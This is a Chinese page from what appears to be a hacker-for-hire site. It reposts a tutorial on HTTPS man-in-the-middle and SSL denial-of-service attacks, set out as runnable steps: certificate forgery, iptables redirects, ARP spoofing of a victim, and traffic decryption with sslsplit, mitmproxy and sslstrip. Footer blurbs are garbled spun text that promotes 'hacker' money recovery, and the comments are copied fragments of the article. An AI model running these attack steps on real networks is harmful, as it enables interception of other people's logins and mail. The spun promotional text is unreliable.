当前位置:首页 > 黑客业务 > 正文内容

教程黑客如何进行网站入侵(新手如何入侵一个网站)

hacker1周前 (10-28)黑客业务6

  HTTPS及HTTPS中间人攻击,全站HTTPS正在称为潮流趋势,国内实现全站https的有淘宝和百度两家。

  https的作用

  C I A:机密性,完整性,可用性(可用性是合法用户可以访问自己有权限访问的资源)解决的是信息传输中数据被篡改。

  窃取加密:对称、非对称、单向

  https工作原理

  https的工作原理还是有必要研究下的(原理我也是从网上学习总结的,感谢这些前辈)

  >>>>

  客户端发起HTTPS请求

  用户在浏览器里输入一个https网址,然后连接到server的443端口。

  >>>>

  服务端的配置

  采用HTTPS协议的服务器必须要有一套数字证书,可以自己制作,也可以向组织申请。区别就是自己颁发的证书需要客户端验证通过,才可以继续访问,而使用受信任的公司申请的证书则不会弹出提示页面web通信中的SSL加密的公钥证书(受信任的第三方证书颁发机构签名颁发)常见的如

  VeriSignThawte

  GlobalSign

  Symantec

  >>>>

  传送证书

  这个证书其实就是公钥,只是包含了很多信息,如证书的颁发机构,过期时间等等。

  >>>>

  客户端解析证书

  这部分工作是有客户端的TLS来完成的,首先会验证公钥是否有效,比如颁发机构,过期时间等等,如果发现异常,则会弹出一个警告框,提示证书存在问题。如果证书没有问题,那么就生成一个随即值。然后用证书对该随机值进行加密。

  >>>>

  传送加密信息

  这部分传送的是用证书加密后的随机值,目的就是让服务端得到这个随机值,以后客户端和服务端的通信就可以通过这个随机值来进行加密解密了。

  >>>>

  服务段解密信息

  服务端用私钥解密后,得到了客户端传过来的随机值(私钥),然后把内容通过该值进行对称加密。所谓对称加密就是,将信息和私钥通过某种算法混合在一起,这样除非知道私钥,不然无法获取内容,而正好客户端和服务端都知道这个私钥,所以只要加密算法够彪悍,私钥够复杂,数据就够安全。

  >>>>

  传输加密后的信息

  这部分信息是服务段用私钥加密后的信息,可以在客户端被还原8. 客户端解密信息客户端用之前生成的私钥解密服务段传过来的信息,于是获取了解密后的内容。整个过程第三方即使监听到了数据,也束手无策。

  大概过程如下

握手——协商加密算法——获得公钥证书——验证公钥证书——交换会话密钥——加密信息传输

  SSL的弱点

  1.ssl是不同的对称、非对称、单向加密算法的组合加密实现(cipher suite)如密钥交换、身份验证使用RAS/Diffie-Hellman,加密数据,使用AES加密,有RAS/DH完成密钥交换,摘要信息由HMAC-SHA2,组成了一个cipher suite,当然,也可以是其他组合。

  2.服务器端为提供更好的兼容性,选择支持大量过时的cipher suite。

  3.协商过程中强迫降级加密强度。

教程黑客如何进行网站入侵(新手如何入侵一个网站)

  4.现代处理器计算能力可以在接收的时间内破解过时加密算法。

  5.黑客购买云计算资源破解。

  HTTPS常见攻击方式

  针对其弱点,常见的https攻击方法有

  降级攻击(把高安全级别的加密算法强制降成低安全级别的加密算法)

  解密攻击(明文、证书伪造)

  协议漏洞、实现方法的漏洞、配置不严格

  HTTPS证书查看

  在进行中间人攻击之前,先查看下证书,可以使用以下软件(以百度为例)

  >>>>

  OpenSSL

  OpenSSL是一个安全套接字层密码库,囊括主要的密码算法、常用的密钥和证书封装管理功能及SSL协议,并提供丰富的应用程序供测试或其它目的使用。

  直接调用openssl库识别目标服务器支持的SSL/TLS cipher suiteopenssl s_client -connect www.baidu.com:443,

  >>>>

  sslcan

  SSLscan主要探测基于ssl的服务,如https。SSLscan是一款探测目标服务器所支持的SSL加密算法工具。

  sslcan能自动识别ssl配置错误,过期协议,过时cipher suite和hash算法默认会检查CRIME、heartbled漏洞,绿色表示安全、红色黄色需要引起注意sslscan -tlsall www.baidu.com:443

  分析证书详细数据

  sslscan -show-certificate --no-ciphersuites www.baidu.com:443

  >>>>

  nmap

  还可以使用nmap的脚本。

  nmap --=ssl-enm-ciphers.nse www.baidu.com

  https中间人攻击

  >>>>

  先生成一个证书

  openssl req -new -x509 -days 1096 -key ca.key -out ca.crt,进行一个新的请求,格式为-x509,现在的证书基本是x509的国际标准的证书格式,有效期为1096天,并使用ca.key私钥,生成ca.crt标准的证书文件。

  sslsplit会自动的调用根证书,根据你要访问哪些网站,根据网站的名称,由根证书签发一个专门针对网站的证书。

  >>>>

  开启路由功能

  中间人也是个终端设备,不具有路由功能,转发过程不是由软件实现的,是由操作系统的路由功能实现的。

  sysctl -w net.ipv4.ip_forward=1,将net.ipv4.ip_forward=1的值设为1,当然用输出重定向或者vim编辑proc/sys/net/ipv4/ip_forward也可。

  >>>>

  写转发规则

  iptables端口转发规则

  当客户端把请求发给中间人终端设备的时候,发到终端的443端口之后,需要用iptables做NAT地址转换,其实是端口转换,把本地443端口收到的包转发到另外一个端口,而另外一个端口由sslsplit所侦听的端口,这样的话,凡是发给443端口的请求流量就会发给slsplit所侦听的端口,而sslsplit就会调用证书伪造一个看起来是目标网站的伪造网站,sslsplit会利用伪造的证书对发过来的流量进行解密

  iptables -t nat -L 查看net的配置,为避免干扰,可以使用iptables -F清空配置,并使用netstat -pantu | grep :80 ,netstat -pantu | grep :443检查80和443是否被使用,使用则停止进程

  将80、443端口进行转发给8080和8443端口。

  iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080

  iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443

  当然还可以对其他的协议的加密流量进行中间人攻击。

  iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 //MSA

  iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 //SMTPS

  iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 //IMAPS

  iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 //POP3S

  >>>>

  进行arp欺骗

  使用arpspoof进行arp欺骗,不管是进行DNS欺骗还是HTTP或HTTPS的中间人攻击,arp欺骗都是前提,所以,在进行防御的时候,将ip和MAC绑定,就可以防止中间人攻击了。

  arpspoof -i eth0 -t 192.168.1.127 -r 192.168.1.1(以下展示的实验环境的地址)

  能看到网关的arp已经变成了kali的mac地址了。

  >>>>

  进行监听

  sslsplit -D -l connect.log -j /root/test -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080,-D 表示debug,-l表示把连接请求记录到一个文件中,不是数据信息,只是连接信息,-j越狱的根目录,-S请求的数据,放在-j指定的目录下的目录,如root/test/logdir,所以得先建立这个几个目录,-k指定私钥,-c指定私钥签发的证书,ssl的流量加密的流量在本地的所有ip地址侦听8443端口,不加密的普通的tcp流量在本地的8080端口侦听。

  >>>>

  验证

  在客户端验证。本地电脑默认集成证书服务器的根证书,是不信任我们伪造的证书,所以在访问淘宝的时候,看到有这样的提示,就是有问题的。

  登录验证并查看证书。

  查看连接信息。

  查看数据信息。

  查看到https加密后的信息已经被解密。

教程黑客如何进行网站入侵(新手如何入侵一个网站)

  我们就可以劫持https的流量了,但是会提示网站证书会报错,解决方法是将根证书安装到客户端,再次访问就不会报根证书的问题了。访问的任何东西就会被没有告警的记录下来。所以在看到访问网站证书报错的情况下,需要格外注意。

  除了sslsplit进行监听,还可以使用Mitmproxy进行中间人攻击,同前面的步骤相同,仍然需要伪造证书,进行arp欺骗,但不需要指定监听的端口,默认监听8080端口,可以对默认的端口进行修改。

  iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080

  iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080

  启动Mitmproxymitmproxy -T --host -w mitmproxy.log,不但能进行监控,每个具体的数据可以打开查看详细的请求。

  还可以使用SSLstrip进行监听,与前两种工具不同,将客户端到中间人的流量变为明文。需要arp欺骗,不需要生成伪造证书,只需写iptables规则,并让sslstrip 监听某一个端口。

  sslstrip -l 8080

  ssl/TLS拒绝服务攻击

  ssl/TLS拒绝服务攻击的原理及特性:

  1、SSL协商加密对性能开销增加,大量握手请求会导致拒绝服务。

  2、利用ssl sevure renegotiation 特性,在单一TCP连接中生成数千个SSL重连接请求,造成服务器资源过载。

  3、与流量式拒绝服务攻击不同,thc-ssl-dos可以利用dsl线路打垮30G带宽的服务器

  4、对SMTPS、POP3S等服务同样有效

  可以使用德国黑客组织“The Hacker’s Choice”发布了工具THC SSL DOS、thc-ssl-dos ip 端口 --accept,--accept是作者强制要求加的参数,不加此参数回提示你这个服务器是你的服务器吗,不是你的服务器就不要进行测试,--accept只有接收确认是自己的服务器,才可以使用这个工具去发起ssl重连接的握手请求。

  对策

  禁用SSL-Renegotoation、使用SSL Accelerator(不过可以通过修改thc-ssl-dos代码,可以绕过以上对策)

  作者: “罹殇” 博客

  来源:https://wt7315.blog.51cto.com/10319657/1876945

炼石信息安全培训春季班开招

QQ:495066536

372806985

敬请持续关注……

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:http://therlest.com/150169.html

分享给朋友:

“教程黑客如何进行网站入侵(新手如何入侵一个网站)” 的相关文章

字节承认商业化团队撤城裁员

据晋江新闻网2021年10月19日21:00:43的最新发布,微博网友@ 爆料。 平安夜来临之际,事件,在网上炒得沸沸扬扬,引发全网热议! 据悉,黑客追款后来被报道了几次。猜测第六百八十八章逃港者第六百八十九章调侃第六百。相对这个账号是他的。 1.专业网赌追回律师 首先确保整个真正的黑客追款方案是最...

猪肉怎么选?颜色有区别吗?今天做饭的时候发现上次买的猪肉颜色跟这

猪肉怎么选?颜色有区别吗?今天做饭的时候发现上次买的猪肉颜色跟这 买猪肉时,根据肉的颜色、外观、气味等可以判断出肉的质量是好还是坏。优质的猪肉,脂肪白而硬,且带有香味。肉的外面往往有一层稍带干燥的膜,肉质紧密,富有弹性,手指压后凹陷处立即复原。 次鲜肉肉色较鲜肉暗,缺乏光泽,脂肪呈灰白色;表面带...

今天发生的重大新闻5条,国内新闻最新消息10条

近期发生的额十件大新闻,伊朗重申继续实施核计划。本·拉登被击毙,近期国内外新闻要近期。 被关闭·国家最高科学技术奖揭晓"青藏铁路工程"等获奖·广西陆川一在建楼面坍塌14名工人坠地受伤,文汇报,执政党民族解放党总统,到了主要内容介绍完。 这是初中作业吧!月1日—德国总理默克尔倡议成立联合国经济理事会。...

马来西亚dhl国际快递查询,国际快递订单号查询官网

物流集团Deutsche Post 国际DHL旗下公司,马来西亚,大概22号左右抵达当地关口。作业程序HONG查询 KONG-HONG KONG目的地马来西亚,至于查询的话,很方便的。也可以打电话咨询,然后点击查询就会有快递信息!通过快递官网查询物流的。一直查询不到相关信息!打开DHL官网,感激不尽...

书黑客,黑客软件破解吃鸡,网站黑客攻击工具

关于较新版别的Windbg,官网已不再支撑独自下载,只能经过Windows SDK里边勾选来装置,不过装置之后Redist目录会有x64/x86/arm的装置包,也可独立装置。 此次评选活动的意图在于,在安全社区中宣扬这些技能,让职业进步对安全的注重,一起也能让这些技能能遭到认可和铭记。 因而,根据...

intense靶场-获取User权限

出品|MS08067实验室(www.ms08067.com) 本文作者:jokelove(Ms08067内网安全小组成员) Intense是HTB中一个难度中上的靶场,需要参与者具备下述能力: 1. Python源码审计 2. SQL注入原理 3. SNMP远程命令执行 4. 栈溢出...

评论列表

边侣午言
1周前 (10-28)

的就是让服务端得到这个随机值,以后客户端和服务端的通信就可以通过这个随机值来进行加密解密了。  >>>>  服务段解密信息  服务端用私钥解密后,得到了客户端传过来的随机值(私钥),然后把内容通过该值进行对称加密

假欢笑惜
1周前 (10-28)

你这个服务器是你的服务器吗,不是你的服务器就不要进行测试,--accept只有接收确认是自己的服务器,才可以使用这个工具去发起ssl重连接的握手请求。  对策  禁用SSL-Renegotoation、使用SSL Accelerator(不过可以通过修改thc-ssl-dos代码,可以绕过

瑰颈吝吻
1周前 (10-28)

换、身份验证使用RAS/Diffie-Hellman,加密数据,使用AES加密,有RAS/DH完成密钥交换,摘要信息由HMAC-SHA2,组成了一个cipher s

寻妄千纥
1周前 (10-28)

基于ssl的服务,如https。SSLscan是一款探测目标服务器所支持的SSL加密算法工具。  sslcan能自动识别ssl配置错误,过期协议,过时cipher suite和hash算法默认

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。